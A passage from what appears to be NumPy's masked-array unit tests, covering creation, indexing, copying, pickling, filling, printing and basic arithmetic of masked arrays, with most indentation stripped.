assert_equal(np.concatenate((x, y), 1), xmym)
assert_equal(np.concatenate((xm.mask, ym.mask), 1), xmym._mask)
x = zeros(2)
y = array(ones(2), mask=[False, True])
z = concatenate((x, y))
assert_array_equal(z, [0, 0, 1, 1])
assert_array_equal(z.mask, [False, False, False, True])
z = concatenate((y, x))
assert_array_equal(z, [1, 1, 0, 0])
assert_array_equal(z.mask, [False, True, False, False])
def test_concatenate_flexible(self):
# Tests the concatenation on flexible arrays.
data = masked_array(list(zip(np.random.rand(10),
np.arange(10))),
dtype=[('a', float), ('b', int)])
test = concatenate([data[:5], data[5:]])
assert_equal_records(test, data)
def test_creation_ndmin(self):
# Check the use of ndmin
x = array([1, 2, 3], mask=[1, 0, 0], ndmin=2)
assert_equal(x.shape, (1, 3))
assert_equal(x._data, [[1, 2, 3]])
assert_equal(x._mask, [[1, 0, 0]])
def test_creation_ndmin_from_maskedarray(self):
# Make sure we're not losing the original mask w/ ndmin
x = array([1, 2, 3])
x[-1] = masked
xx = array(x, ndmin=2, dtype=float)
assert_equal(x.shape, x._mask.shape)
assert_equal(xx.shape, xx._mask.shape)
def test_creation_maskcreation(self):
# Tests how masks are initialized at the creation of Maskedarrays.
data = arange(24, dtype=float)
data[[3, 6, 15]] = masked
dma_1 = MaskedArray(data)
assert_equal(dma_1.mask, data.mask)
dma_2 = MaskedArray(dma_1)
assert_equal(dma_2.mask, dma_1.mask)
dma_3 = MaskedArray(dma_1, mask=[1, 0, 0, 0] * 6)
fail_if_equal(dma_3.mask, dma_1.mask)
def test_creation_with_list_of_maskedarrays(self):
        # Tests creating a masked array from a list of masked arrays.
x = array(np.arange(5), mask=[1, 0, 0, 0, 0])
data = array((x, x[::-1]))
assert_equal(data, [[0, 1, 2, 3, 4], [4, 3, 2, 1, 0]])
assert_equal(data._mask, [[1, 0, 0, 0, 0], [0, 0, 0, 0, 1]])
x.mask = nomask
data = array((x, x[::-1]))
assert_equal(data, [[0, 1, 2, 3, 4], [4, 3, 2, 1, 0]])
self.assertTrue(data.mask is nomask)
def test_asarray(self):
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
xm.fill_value = -9999
xm._hardmask = True
xmm = asarray(xm)
assert_equal(xmm._data, xm._data)
assert_equal(xmm._mask, xm._mask)
assert_equal(xmm.fill_value, xm.fill_value)
assert_equal(xmm._hardmask, xm._hardmask)
def test_fix_invalid(self):
# Checks fix_invalid.
with np.errstate(invalid='ignore'):
data = masked_array([np.nan, 0., 1.], mask=[0, 0, 1])
data_fixed = fix_invalid(data)
assert_equal(data_fixed._data, [data.fill_value, 0., 1.])
assert_equal(data_fixed._mask, [1., 0., 1.])
def test_maskedelement(self):
# Test of masked element
x = arange(6)
x[1] = masked
self.assertTrue(str(masked) == '--')
self.assertTrue(x[1] is masked)
assert_equal(filled(x[1], 0), 0)
# don't know why these should raise an exception...
#self.assertRaises(Exception, lambda x,y: x+y, masked, masked)
#self.assertRaises(Exception, lambda x,y: x+y, masked, 2)
#self.assertRaises(Exception, lambda x,y: x+y, masked, xx)
#self.assertRaises(Exception, lambda x,y: x+y, xx, masked)
def test_set_element_as_object(self):
# Tests setting elements with object
a = empty(1, dtype=object)
x = (1, 2, 3, 4, 5)
a[0] = x
assert_equal(a[0], x)
self.assertTrue(a[0] is x)
import datetime
dt = datetime.datetime.now()
a[0] = dt
self.assertTrue(a[0] is dt)
def test_indexing(self):
# Tests conversions and indexing
x1 = np.array([1, 2, 4, 3])
x2 = array(x1, mask=[1, 0, 0, 0])
x3 = array(x1, mask=[0, 1, 0, 1])
x4 = array(x1)
# test conversion to strings
str(x2) # raises?
repr(x2) # raises?
assert_equal(np.sort(x1), sort(x2, endwith=False))
# tests of indexing
assert_(type(x2[1]) is type(x1[1]))
assert_(x1[1] == x2[1])
assert_(x2[0] is masked)
assert_equal(x1[2], x2[2])
assert_equal(x1[2:5], x2[2:5])
assert_equal(x1[:], x2[:])
assert_equal(x1[1:], x3[1:])
x1[2] = 9
x2[2] = 9
assert_equal(x1, x2)
x1[1:3] = 99
x2[1:3] = 99
assert_equal(x1, x2)
x2[1] = masked
assert_equal(x1, x2)
x2[1:3] = masked
assert_equal(x1, x2)
x2[:] = x1
x2[1] = masked
assert_(allequal(getmask(x2), array([0, 1, 0, 0])))
x3[:] = masked_array([1, 2, 3, 4], [0, 1, 1, 0])
assert_(allequal(getmask(x3), array([0, 1, 1, 0])))
x4[:] = masked_array([1, 2, 3, 4], [0, 1, 1, 0])
assert_(allequal(getmask(x4), array([0, 1, 1, 0])))
assert_(allequal(x4, array([1, 2, 3, 4])))
x1 = np.arange(5) * 1.0
x2 = masked_values(x1, 3.0)
assert_equal(x1, x2)
assert_(allequal(array([0, 0, 0, 1, 0], MaskType), x2.mask))
assert_equal(3.0, x2.fill_value)
x1 = array([1, 'hello', 2, 3], object)
x2 = np.array([1, 'hello', 2, 3], object)
s1 = x1[1]
s2 = x2[1]
assert_equal(type(s2), str)
assert_equal(type(s1), str)
assert_equal(s1, s2)
assert_(x1[1:1].shape == (0,))
def test_matrix_indexing(self):
# Tests conversions and indexing
x1 = np.matrix([[1, 2, 3], [4, 3, 2]])
x2 = array(x1, mask=[[1, 0, 0], [0, 1, 0]])
x3 = array(x1, mask=[[0, 1, 0], [1, 0, 0]])
x4 = array(x1)
# test conversion to strings
str(x2) # raises?
repr(x2) # raises?
# tests of indexing
assert_(type(x2[1, 0]) is type(x1[1, 0]))
assert_(x1[1, 0] == x2[1, 0])
assert_(x2[1, 1] is masked)
assert_equal(x1[0, 2], x2[0, 2])
assert_equal(x1[0, 1:], x2[0, 1:])
assert_equal(x1[:, 2], x2[:, 2])
assert_equal(x1[:], x2[:])
assert_equal(x1[1:], x3[1:])
x1[0, 2] = 9
x2[0, 2] = 9
assert_equal(x1, x2)
x1[0, 1:] = 99
x2[0, 1:] = 99
assert_equal(x1, x2)
x2[0, 1] = masked
assert_equal(x1, x2)
x2[0, 1:] = masked
assert_equal(x1, x2)
x2[0, :] = x1[0, :]
x2[0, 1] = masked
assert_(allequal(getmask(x2), np.array([[0, 1, 0], [0, 1, 0]])))
x3[1, :] = masked_array([1, 2, 3], [1, 1, 0])
assert_(allequal(getmask(x3)[1], array([1, 1, 0])))
assert_(allequal(getmask(x3[1]), array([1, 1, 0])))
x4[1, :] = masked_array([1, 2, 3], [1, 1, 0])
assert_(allequal(getmask(x4[1]), array([1, 1, 0])))
assert_(allequal(x4[1], array([1, 2, 3])))
x1 = np.matrix(np.arange(5) * 1.0)
x2 = masked_values(x1, 3.0)
assert_equal(x1, x2)
assert_(allequal(array([0, 0, 0, 1, 0], MaskType), x2.mask))
assert_equal(3.0, x2.fill_value)
def test_copy(self):
# Tests of some subtle points of copying and sizing.
n = [0, 0, 1, 0, 0]
m = make_mask(n)
m2 = make_mask(m)
self.assertTrue(m is m2)
m3 = make_mask(m, copy=1)
self.assertTrue(m is not m3)
x1 = np.arange(5)
y1 = array(x1, mask=m)
#self.assertTrue( y1._data is x1)
assert_equal(y1._data.__array_interface__, x1.__array_interface__)
self.assertTrue(allequal(x1, y1.data))
#self.assertTrue( y1.mask is m)
assert_equal(y1._mask.__array_interface__, m.__array_interface__)
y1a = array(y1)
self.assertTrue(y1a._data.__array_interface__ ==
y1._data.__array_interface__)
self.assertTrue(y1a.mask is y1.mask)
y2 = array(x1, mask=m)
self.assertTrue(y2._data.__array_interface__ == x1.__array_interface__)
#self.assertTrue( y2.mask is m)
self.assertTrue(y2._mask.__array_interface__ == m.__array_interface__)
self.assertTrue(y2[2] is masked)
y2[2] = 9
self.assertTrue(y2[2] is not masked)
#self.assertTrue( y2.mask is not m)
self.assertTrue(y2._mask.__array_interface__ != m.__array_interface__)
self.assertTrue(allequal(y2.mask, 0))
y3 = array(x1 * 1.0, mask=m)
self.assertTrue(filled(y3).dtype is (x1 * 1.0).dtype)
x4 = arange(4)
x4[2] = masked
y4 = resize(x4, (8,))
assert_equal(concatenate([x4, x4]), y4)
assert_equal(getmask(y4), [0, 0, 1, 0, 0, 0, 1, 0])
y5 = repeat(x4, (2, 2, 2, 2), axis=0)
assert_equal(y5, [0, 0, 1, 1, 2, 2, 3, 3])
y6 = repeat(x4, 2, axis=0)
assert_equal(y5, y6)
y7 = x4.repeat((2, 2, 2, 2), axis=0)
assert_equal(y5, y7)
y8 = x4.repeat(2, 0)
assert_equal(y5, y8)
y9 = x4.copy()
assert_equal(y9._data, x4._data)
assert_equal(y9._mask, x4._mask)
x = masked_array([1, 2, 3], mask=[0, 1, 0])
# Copy is False by default
y = masked_array(x)
assert_equal(y._data.ctypes.data, x._data.ctypes.data)
assert_equal(y._mask.ctypes.data, x._mask.ctypes.data)
y = masked_array(x, copy=True)
assert_not_equal(y._data.ctypes.data, x._data.ctypes.data)
assert_not_equal(y._mask.ctypes.data, x._mask.ctypes.data)
def test_deepcopy(self):
from copy import deepcopy
a = array([0, 1, 2], mask=[False, True, False])
copied = deepcopy(a)
assert_equal(copied.mask, a.mask)
assert_not_equal(id(a._mask), id(copied._mask))
copied[1] = 1
assert_equal(copied.mask, [0, 0, 0])
assert_equal(a.mask, [0, 1, 0])
copied = deepcopy(a)
assert_equal(copied.mask, a.mask)
copied.mask[1] = False
assert_equal(copied.mask, [0, 0, 0])
assert_equal(a.mask, [0, 1, 0])
def test_str_repr(self):
a = array([0, 1, 2], mask=[False, True, False])
assert_equal(str(a), '[0 -- 2]')
assert_equal(repr(a), 'masked_array(data = [0 -- 2],\n'
' mask = [False True False],\n'
' fill_value = 999999)\n')
def test_pickling(self):
# Tests pickling
a = arange(10)
a[::3] = masked
a.fill_value = 999
a_pickled = pickle.loads(a.dumps())
assert_equal(a_pickled._mask, a._mask)
assert_equal(a_pickled._data, a._data)
assert_equal(a_pickled.fill_value, 999)
def test_pickling_subbaseclass(self):
# Test pickling w/ a subclass of ndarray
a = array(np.matrix(list(range(10))), mask=[1, 0, 1, 0, 0] * 2)
a_pickled = pickle.loads(a.dumps())
assert_equal(a_pickled._mask, a._mask)
assert_equal(a_pickled, a)
self.assertTrue(isinstance(a_pickled._data, np.matrix))
def test_pickling_maskedconstant(self):
# Test pickling MaskedConstant
mc = np.ma.masked
mc_pickled = pickle.loads(mc.dumps())
assert_equal(mc_pickled._baseclass, mc._baseclass)
assert_equal(mc_pickled._mask, mc._mask)
assert_equal(mc_pickled._data, mc._data)
def test_pickling_wstructured(self):
# Tests pickling w/ structured array
a = array([(1, 1.), (2, 2.)], mask=[(0, 0), (0, 1)],
dtype=[('a', int), ('b', float)])
a_pickled = pickle.loads(a.dumps())
assert_equal(a_pickled._mask, a._mask)
assert_equal(a_pickled, a)
def test_pickling_keepalignment(self):
# Tests pickling w/ F_CONTIGUOUS arrays
a = arange(10)
a.shape = (-1, 2)
b = a.T
test = pickle.loads(pickle.dumps(b))
assert_equal(test, b)
def test_single_element_subscript(self):
# Tests single element subscripts of Maskedarrays.
a = array([1, 3, 2])
b = array([1, 3, 2], mask=[1, 0, 1])
assert_equal(a[0].shape, ())
assert_equal(b[0].shape, ())
assert_equal(b[1].shape, ())
def test_topython(self):
# Tests some communication issues with Python.
assert_equal(1, int(array(1)))
assert_equal(1.0, float(array(1)))
assert_equal(1, int(array([[[1]]])))
assert_equal(1.0, float(array([[1]])))
self.assertRaises(TypeError, float, array([1, 1]))
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
assert_(np.isnan(float(array([1], mask=[1]))))
a = array([1, 2, 3], mask=[1, 0, 0])
self.assertRaises(TypeError, lambda:float(a))
assert_equal(float(a[-1]), 3.)
self.assertTrue(np.isnan(float(a[0])))
self.assertRaises(TypeError, int, a)
assert_equal(int(a[-1]), 3)
self.assertRaises(MAError, lambda:int(a[0]))
def test_oddfeatures_1(self):
# Test of other odd features
x = arange(20)
x = x.reshape(4, 5)
x.flat[5] = 12
assert_(x[1, 0] == 12)
z = x + 10j * x
assert_equal(z.real, x)
assert_equal(z.imag, 10 * x)
assert_equal((z * conjugate(z)).real, 101 * x * x)
z.imag[...] = 0.0
x = arange(10)
x[3] = masked
assert_(str(x[3]) == str(masked))
c = x >= 8
assert_(count(where(c, masked, masked)) == 0)
assert_(shape(where(c, masked, masked)) == c.shape)
z = masked_where(c, x)
assert_(z.dtype is x.dtype)
assert_(z[3] is masked)
assert_(z[4] is not masked)
assert_(z[7] is not masked)
assert_(z[8] is masked)
assert_(z[9] is masked)
assert_equal(x, z)
def test_oddfeatures_2(self):
# Tests some more features.
x = array([1., 2., 3., 4., 5.])
c = array([1, 1, 1, 0, 0])
x[2] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
c[0] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
assert_(z[0] is masked)
assert_(z[1] is not masked)
assert_(z[2] is masked)
def test_oddfeatures_3(self):
# Tests some generic features
atest = array([10], mask=True)
btest = array([20])
idx = atest.mask
atest[idx] = btest[idx]
assert_equal(atest, [20])
def test_filled_w_object_dtype(self):
a = np.ma.masked_all(1, dtype='O')
assert_equal(a.filled('x')[0], 'x')
def test_filled_w_flexible_dtype(self):
# Test filled w/ flexible dtype
flexi = array([(1, 1, 1)],
dtype=[('i', int), ('s', '|S8'), ('f', float)])
flexi[0] = masked
assert_equal(flexi.filled(),
np.array([(default_fill_value(0),
default_fill_value('0'),
default_fill_value(0.),)], dtype=flexi.dtype))
flexi[0] = masked
assert_equal(flexi.filled(1),
np.array([(1, '1', 1.)], dtype=flexi.dtype))
def test_filled_w_mvoid(self):
# Test filled w/ mvoid
ndtype = [('a', int), ('b', float)]
a = mvoid((1, 2.), mask=[(0, 1)], dtype=ndtype)
# Filled using default
test = a.filled()
assert_equal(tuple(test), (1, default_fill_value(1.)))
# Explicit fill_value
test = a.filled((-1, -1))
assert_equal(tuple(test), (1, -1))
# Using predefined filling values
a.fill_value = (-999, -999)
assert_equal(tuple(a.filled()), (1, -999))
def test_filled_w_nested_dtype(self):
# Test filled w/ nested dtype
ndtype = [('A', int), ('B', [('BA', int), ('BB', int)])]
a = array([(1, (1, 1)), (2, (2, 2))],
mask=[(0, (1, 0)), (0, (0, 1))], dtype=ndtype)
test = a.filled(0)
control = np.array([(1, (0, 1)), (2, (2, 0))], dtype=ndtype)
assert_equal(test, control)
test = a['B'].filled(0)
control = np.array([(0, 1), (2, 0)], dtype=a['B'].dtype)
assert_equal(test, control)
def test_filled_w_f_order(self):
# Test filled w/ F-contiguous array
a = array(np.array([(0, 1, 2), (4, 5, 6)], order='F'),
mask=np.array([(0, 0, 1), (1, 0, 0)], order='F'),
order='F') # this is currently ignored
self.assertTrue(a.flags['F_CONTIGUOUS'])
self.assertTrue(a.filled(0).flags['F_CONTIGUOUS'])
def test_optinfo_propagation(self):
# Checks that _optinfo dictionary isn't back-propagated
x = array([1, 2, 3, ], dtype=float)
x._optinfo['info'] = '???'
y = x.copy()
assert_equal(y._optinfo['info'], '???')
y._optinfo['info'] = '!!!'
assert_equal(x._optinfo['info'], '???')
def test_fancy_printoptions(self):
# Test printing a masked array w/ fancy dtype.
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = array([(1, (2, 3.0)), (4, (5, 6.0))],
mask=[(1, (0, 1)), (0, (1, 0))],
dtype=fancydtype)
control = "[(--, (2, --)) (4, (--, 6.0))]"
assert_equal(str(test), control)
def test_flatten_structured_array(self):
# Test flatten_structured_array on arrays
# On ndarray
ndtype = [('a', int), ('b', float)]
a = np.array([(1, 1), (2, 2)], dtype=ndtype)
test = flatten_structured_array(a)
control = np.array([[1., 1.], [2., 2.]], dtype=np.float)
assert_equal(test, control)
assert_equal(test.dtype, control.dtype)
# On masked_array
a = array([(1, 1), (2, 2)], mask=[(0, 1), (1, 0)], dtype=ndtype)
test = flatten_structured_array(a)
control = array([[1., 1.], [2., 2.]],
mask=[[0, 1], [1, 0]], dtype=np.float)
assert_equal(test, control)
assert_equal(test.dtype, control.dtype)
assert_equal(test.mask, control.mask)
# On masked array with nested structure
ndtype = [('a', int), ('b', [('ba', int), ('bb', float)])]
a = array([(1, (1, 1.1)), (2, (2, 2.2))],
mask=[(0, (1, 0)), (1, (0, 1))], dtype=ndtype)
test = flatten_structured_array(a)
control = array([[1., 1., 1.1], [2., 2., 2.2]],
mask=[[0, 1, 0], [1, 0, 1]], dtype=np.float)
assert_equal(test, control)
assert_equal(test.dtype, control.dtype)
assert_equal(test.mask, control.mask)
# Keeping the initial shape
ndtype = [('a', int), ('b', float)]
a = np.array([[(1, 1), ], [(2, 2), ]], dtype=ndtype)
test = flatten_structured_array(a)
control = np.array([[[1., 1.], ], [[2., 2.], ]], dtype=np.float)
assert_equal(test, control)
assert_equal(test.dtype, control.dtype)
def test_void0d(self):
# Test creating a mvoid object
ndtype = [('a', int), ('b', int)]
a = np.array([(1, 2,)], dtype=ndtype)[0]
f = mvoid(a)
assert_(isinstance(f, mvoid))
a = masked_array([(1, 2)], mask=[(1, 0)], dtype=ndtype)[0]
assert_(isinstance(a, mvoid))
a = masked_array([(1, 2), (1, 2)], mask=[(1, 0), (0, 0)], dtype=ndtype)
f = mvoid(a._data[0], a._mask[0])
assert_(isinstance(f, mvoid))
def test_mvoid_getitem(self):
# Test mvoid.__getitem__
ndtype = [('a', int), ('b', int)]
a = masked_array([(1, 2,), (3, 4)], mask=[(0, 0), (1, 0)],
dtype=ndtype)
# w/o mask
f = a[0]
self.assertTrue(isinstance(f, mvoid))
assert_equal((f[0], f['a']), (1, 1))
assert_equal(f['b'], 2)
# w/ mask
f = a[1]
self.assertTrue(isinstance(f, mvoid))
self.assertTrue(f[0] is masked)
self.assertTrue(f['a'] is masked)
assert_equal(f[1], 4)
def test_mvoid_iter(self):
# Test iteration on __getitem__
ndtype = [('a', int), ('b', int)]
a = masked_array([(1, 2,), (3, 4)], mask=[(0, 0), (1, 0)],
dtype=ndtype)
# w/o mask
assert_equal(list(a[0]), [1, 2])
# w/ mask
assert_equal(list(a[1]), [masked, 4])
def test_mvoid_print(self):
# Test printing a mvoid
mx = array([(1, 1), (2, 2)], dtype=[('a', int), ('b', int)])
assert_equal(str(mx[0]), "(1, 1)")
mx['b'][0] = masked
ini_display = masked_print_option._display
masked_print_option.set_display("-X-")
try:
assert_equal(str(mx[0]), "(1, -X-)")
assert_equal(repr(mx[0]), "(1, -X-)")
finally:
masked_print_option.set_display(ini_display)
def test_mvoid_multidim_print(self):
# regression test for gh-6019
t_ma = masked_array(data = [([1, 2, 3],)],
mask = [([False, True, False],)],
fill_value = ([999999, 999999, 999999],),
dtype = [('a', '<i8', (3,))])
assert str(t_ma[0]) == "([1, --, 3],)"
assert repr(t_ma[0]) == "([1, --, 3],)"
        # additional tests with structured arrays
t_2d = masked_array(data = [([[1, 2], [3,4]],)],
mask = [([[False, True], [True, False]],)],
dtype = [('a', '<i8', (2,2))])
assert str(t_2d[0]) == "([[1, --], [--, 4]],)"
assert repr(t_2d[0]) == "([[1, --], [--, 4]],)"
t_0d = masked_array(data = [(1,2)],
mask = [(True,False)],
dtype = [('a', '<i8'), ('b', '<i8')])
assert str(t_0d[0]) == "(--, 2)"
assert repr(t_0d[0]) == "(--, 2)"
t_2d = masked_array(data = [([[1, 2], [3,4]], 1)],
mask = [([[False, True], [True, False]], False)],
dtype = [('a', '<i8', (2,2)), ('b', float)])
assert str(t_2d[0]) == "([[1, --], [--, 4]], 1.0)"
assert repr(t_2d[0]) == "([[1, --], [--, 4]], 1.0)"
t_ne = masked_array(data=[(1, (1, 1))],
mask=[(True, (True, False))],
dtype = [('a', '<i8'), ('b', 'i4,i4')])
assert str(t_ne[0]) == "(--, (--, 1))"
assert repr(t_ne[0]) == "(--, (--, 1))"
def test_object_with_array(self):
mx1 = masked_array([1.], mask=[True])
mx2 = masked_array([1., 2.])
mx = masked_array([mx1, mx2], mask=[False, True])
assert mx[0] is mx1
assert mx[1] is not mx2
assert np.all(mx[1].data == mx2.data)
assert np.all(mx[1].mask)
# check that we return a view.
mx[1].data[0] = 0.
assert mx2[0] == 0.
class TestMaskedArrayArithmetic(TestCase):
# Base test class for MaskedArrays.
def setUp(self):
# Base data definition.
x = np.array([1., 1., 1., -2., pi/2.0, 4., 5., -10., 10., 1., 2., 3.])
y = np.array([5., 0., 3., 2., -1., -4., 0., -10., 10., 1., 0., 3.])
a10 = 10.
m1 = [1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
m2 = [0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1]
xm = masked_array(x, mask=m1)
ym = masked_array(y, mask=m2)
z = np.array([-.5, 0., .5, .8])
zm = masked_array(z, mask=[0, 1, 0, 0])
xf = np.where(m1, 1e+20, x)
xm.set_fill_value(1e+20)
self.d = (x, y, a10, m1, m2, xm, ym, z, zm, xf)
self.err_status = np.geterr()
np.seterr(divide='ignore', invalid='ignore')
def tearDown(self):
np.seterr(**self.err_status)
def test_basic_arithmetic(self):
# Test of basic arithmetic.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
a2d = array([[1, 2], [0, 4]])
a2dm = masked_array(a2d, [[0, 0], [1, 0]])
assert_equal(a2d * a2d, a2d * a2dm)
assert_equal(a2d + a2d, a2d + a2dm)
assert_equal(a2d - a2d, a2d - a2dm)
for s in [(12,), (4, 3), (2, 6)]:
x = x.reshape(s)
y = y.reshape(s)
xm = xm.reshape(s)
ym = ym.reshape(s)
xf = xf.reshape(s)
assert_equal(-x, -xm)
assert_equal(x + y, xm + ym)
assert_equal(x - y, xm - ym)
assert_equal(x * y, xm * ym)
assert_equal(x / y, xm / ym)
assert_equal(a10 + y, a10 + ym)
assert_equal(a10 - y, a10 - ym)
assert_equal(a10 * y, a10 * ym)
assert_equal(a10 / y, a10 / ym)
assert_equal(x + a10, xm + a10)
assert_equal(x - a10, xm - a10)
assert_equal(x * a10, xm * a10)
assert_equal(x / a10, xm / a10)
assert_equal(x ** 2, xm ** 2)
assert_equal(abs(x) ** 2.5, abs(xm) ** 2.5)
assert_equal(x ** y, xm ** ym)
assert_equal(np.add(x, y), add(xm, ym))
assert_equal(np.subtract(x, y), subtract(xm, ym))
assert_equal(np.multiply(x, y), multiply(xm, ym))
assert_equal(np.divide(x, y), divide(xm, ym))
def test_divide_on_different_shapes(self):
x = arange(6, dtype=float)
x.shape = (2, 3)
y = arange(3, dtype=float)
z = x / y
assert_equal(z, [[-1., 1., 1.], [-1., 4., 2.5]])
assert_equal(z.mask, [[1, 0, 0], [1, 0, 0]])
z = x / y[None,:]
assert_equal(z, [[-1., 1., 1.], [-1., 4., 2.5]])
assert_equal(z.mask, [[1, 0, 0], [1, 0, 0]])
y = arange(2, dtype=float)
z = x / y[:, None]
assert_equal(z, [[-1., -1., -1.], [3., 4., 5.]])
assert_equal(z.mask, [[1, 1, 1], [0, 0, 0]])
def test_mixed_arithmetic(self):
        # Tests mixed arithmetic.
na = np.array([1])
ma = array([1])
self.assertTrue(isinstance(na + ma, MaskedArray))
self.assertTrue(isinstance(ma + na, MaskedArray))
def test_limits_arithmetic(self):
tiny = np.finfo(float).tiny
a = array([tiny, 1. / tiny, 0.])
assert_equal(getmaskarray(a / 2), [0, 0, 0])
assert_equal(getmaskarray(2 / a), [1, 0, 1])
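        # (Dividing by tiny risks overflow and dividing by zero is invalid,
        # so the domained division masks the first and last entries of 2/a.)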
def test_masked_singleton_arithmetic(self):
        # Tests some scalar arithmetic on MaskedArrays.
# Masked singleton should remain masked no matter what
xm = array(0, mask=1)
self.assertTrue((1 / array(0)).mask)
self.assertTrue((1 + xm).mask)
self.assertTrue((-xm).mask)
self.assertTrue(maximum(xm, xm).mask)
self.assertTrue(minimum(xm, xm).mask)
def test_masked_singleton_equality(self):
        # Tests (in)equality on the masked singleton
a = array([1, 2, 3], mask=[1, 1, 0])
assert_((a[0] == 0) is masked)
assert_((a[0] != 0) is masked)
assert_equal((a[-1] == 0), False)
assert_equal((a[-1] != 0), True)
def test_arithmetic_with_masked_singleton(self):
# Checks that there's no collapsing to masked
x = masked_array([1, 2])
y = x * masked
assert_equal(y.shape, x.shape)
assert_equal(y._mask, [True, True])
y = x[0] * masked
assert_(y is masked)
y = x + masked
assert_equal(y.shape, x.shape)
assert_equal(y._mask, [True, True])
def test_arithmetic_with_masked_singleton_on_1d_singleton(self):
# Check that we're not losing the shape of a singleton
x = masked_array([1, ])
y = x + masked
assert_equal(y.shape, x.shape)
assert_equal(y.mask, [True, ])
def test_scalar_arithmetic(self):
x = array(0, mask=0)
assert_equal(x.filled().ctypes.data, x.ctypes.data)
# Make sure we don't lose the shape in some circumstances
xm = array((0, 0)) / 0.
assert_equal(xm.shape, (2,))
assert_equal(xm.mask, [1, 1])
def test_basic_ufuncs(self):
# Test various functions such as sin, cos.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
assert_equal(np.cos(x), cos(xm))
assert_equal(np.cosh(x), cosh(xm))
assert_equal(np.sin(x), sin(xm))
assert_equal(np.sinh(x), sinh(xm))
assert_equal(np.tan(x), tan(xm))
assert_equal(np.tanh(x), tanh(xm))
assert_equal(np.sqrt(abs(x)), sqrt(xm))
assert_equal(np.log(abs(x)), log(xm))
assert_equal(np.log10(abs(x)), log10(xm))
assert_equal(np.exp(x), exp(xm))
assert_equal(np.arcsin(z), arcsin(zm))
assert_equal(np.arccos(z), arccos(zm))
assert_equal(np.arctan(z), arctan(zm))
assert_equal(np.arctan2(x, y), arctan2(xm, ym))
assert_equal(np.absolute(x), absolute(xm))
assert_equal(np.angle(x + 1j*y), angle(xm + 1j*ym))
assert_equal(np.angle(x + 1j*y, deg=True), angle(xm + 1j*ym, deg=True))
assert_equal(np.equal(x, y), equal(xm, ym))
assert_equal(np.not_equal(x, y), not_equal(xm, ym))
assert_equal(np.less(x, y), less(xm, ym))
assert_equal(np.greater(x, y), greater(xm, ym))
assert_equal(np.less_equal(x, y), less_equal(xm, ym))
assert_equal(np.greater_equal(x, y), greater_equal(xm, ym))
assert_equal(np.conjugate(x), conjugate(xm))
def test_count_func(self):
# Tests count
assert_equal(1, count(1))
        assert_equal(0, count(array(1, mask=[1])))
ott = array([0., 1., 2., 3.], mask=[1, 0, 0, 0])
res = count(ott)
self.assertTrue(res.dtype.type is np.intp)
assert_equal(3, res)
ott = ott.reshape((2, 2))
res = count(ott)
assert_(res.dtype.type is np.intp)
assert_equal(3, res)
res = count(ott, 0)
assert_(isinstance(res, ndarray))
assert_equal([1, 2], res)
assert_(getmask(res) is nomask)
ott = array([0., 1., 2., 3.])
res = count(ott, 0)
assert_(isinstance(res, ndarray))
assert_(res.dtype.type is np.intp)
assert_raises(IndexError, ott.count, 1)
def test_minmax_func(self):
# Tests minimum and maximum.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
        # max/min don't work on shaped arrays, so compare on raveled copies
xr = np.ravel(x)
xmr = ravel(xm)
# following are true because of careful selection of data
assert_equal(max(xr), maximum(xmr))
assert_equal(min(xr), minimum(xmr))
assert_equal(minimum([1, 2, 3], [4, 0, 9]), [1, 0, 3])
assert_equal(maximum([1, 2, 3], [4, 0, 9]), [4, 2, 9])
x = arange(5)
y = arange(5) - 2
x[3] = masked
y[0] = masked
assert_equal(minimum(x, y), where(less(x, y), x, y))
assert_equal(maximum(x, y), where(greater(x, y), x, y))
assert_(minimum(x) == 0)
assert_(maximum(x) == 4)
x = arange(4).reshape(2, 2)
x[-1, -1] = masked
assert_equal(maximum(x), 2)
def test_minimummaximum_func(self):
a = np.ones((2, 2))
aminimum = minimum(a, a)
self.assertTrue(isinstance(aminimum, MaskedArray))
assert_equal(aminimum, np.minimum(a, a))
aminimum = minimum.outer(a, a)
self.assertTrue(isinstance(aminimum, MaskedArray))
assert_equal(aminimum, np.minimum.outer(a, a))
amaximum = maximum(a, a)
self.assertTrue(isinstance(amaximum, MaskedArray))
assert_equal(amaximum, np.maximum(a, a))
amaximum = maximum.outer(a, a)
self.assertTrue(isinstance(amaximum, MaskedArray))
assert_equal(amaximum, np.maximum.outer(a, a))
def test_minmax_reduce(self):
        # Test np.maximum.reduce on an array with a full False mask
a = array([1, 2, 3], mask=[False, False, False])
b = np.maximum.reduce(a)
assert_equal(b, 3)
def test_minmax_funcs_with_output(self):
# Tests the min/max functions with explicit outputs
mask = np.random.rand(12).round()
xm = array(np.random.uniform(0, 10, 12), mask=mask)
xm.shape = (3, 4)
for funcname in ('min', 'max'):
# Initialize
npfunc = getattr(np, funcname)
mafunc = getattr(numpy.ma.core, funcname)
# Use the np version
nout = np.empty((4,), dtype=int)
try:
result = npfunc(xm, axis=0, out=nout)
except MaskError:
pass
nout = np.empty((4,), dtype=float)
result = npfunc(xm, axis=0, out=nout)
self.assertTrue(result is nout)
# Use the ma version
nout.fill(-999)
result = mafunc(xm, axis=0, out=nout)
self.assertTrue(result is nout)
def test_minmax_methods(self):
# Additional tests on max/min
(_, _, _, _, _, xm, _, _, _, _) = self.d
xm.shape = (xm.size,)
assert_equal(xm.max(), 10)
self.assertTrue(xm[0].max() is masked)
self.assertTrue(xm[0].max(0) is masked)
self.assertTrue(xm[0].max(-1) is masked)
assert_equal(xm.min(), -10.)
self.assertTrue(xm[0].min() is masked)
self.assertTrue(xm[0].min(0) is masked)
self.assertTrue(xm[0].min(-1) is masked)
assert_equal(xm.ptp(), 20.)
self.assertTrue(xm[0].ptp() is masked)
self.assertTrue(xm[0].ptp(0) is masked)
self.assertTrue(xm[0].ptp(-1) is masked)
x = array([1, 2, 3], mask=True)
self.assertTrue(x.min() is masked)
self.assertTrue(x.max() is masked)
self.assertTrue(x.ptp() is masked)
def test_addsumprod(self):
# Tests add, sum, product.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
